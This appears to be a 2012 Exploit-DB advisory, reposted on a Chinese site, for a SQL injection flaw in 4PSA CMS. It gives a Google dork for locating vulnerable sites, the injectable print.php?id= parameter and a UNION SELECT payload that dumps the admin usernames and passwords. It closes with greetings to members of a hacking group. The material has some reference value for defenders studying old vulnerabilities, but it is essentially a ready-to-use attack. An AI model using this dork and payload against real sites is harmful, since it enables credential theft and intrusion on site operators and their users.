4PSA CMS – SQL Injection - 体验盒子

作者： BHG Security Center

日期： 2012-02-19

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/18497/

#################################################################################
# Exploit Title: 4PSA CMS SQL Injection Vulnerabilities
# Google Dork: "Communications solution from 4PSA."
# Date: 2012/02/19
# Category : [Web Application]
# Author: #BHG Security Center
# Discovered by : Nitrojen90
# WebSite:WwW.Black-hg.Org
# Software Link: http://www.4psa.com/
# Version: Last Version
# Security Risk::High
# Tested on: GNU/Linux - Windows
#################################################################################
# p0c :
#
# http://target.com/print.php?id=[SQL]
#
# write the code in front of the print.php?id= and enter for show all admin
#
# user & Pass.
#
# Eval Code : NULL UNION+SelEct+group_concat(uname,0x3a,pwd),2+FROM user--
#
#################################################################################

#################################################################################
# Special Thanks To : Net.Edit0r - 3H34N - A.Cr0x - 4M!N - ArYaIeIrAN -
G3n3rall
# Mr.XHat - Bl4ck.Viper - Dj.TiniVini
#################################################################################
# GreetZ : All Active Member in #BHG Security Center & md.r00t - hellboy -
fr0nk
#################################################################################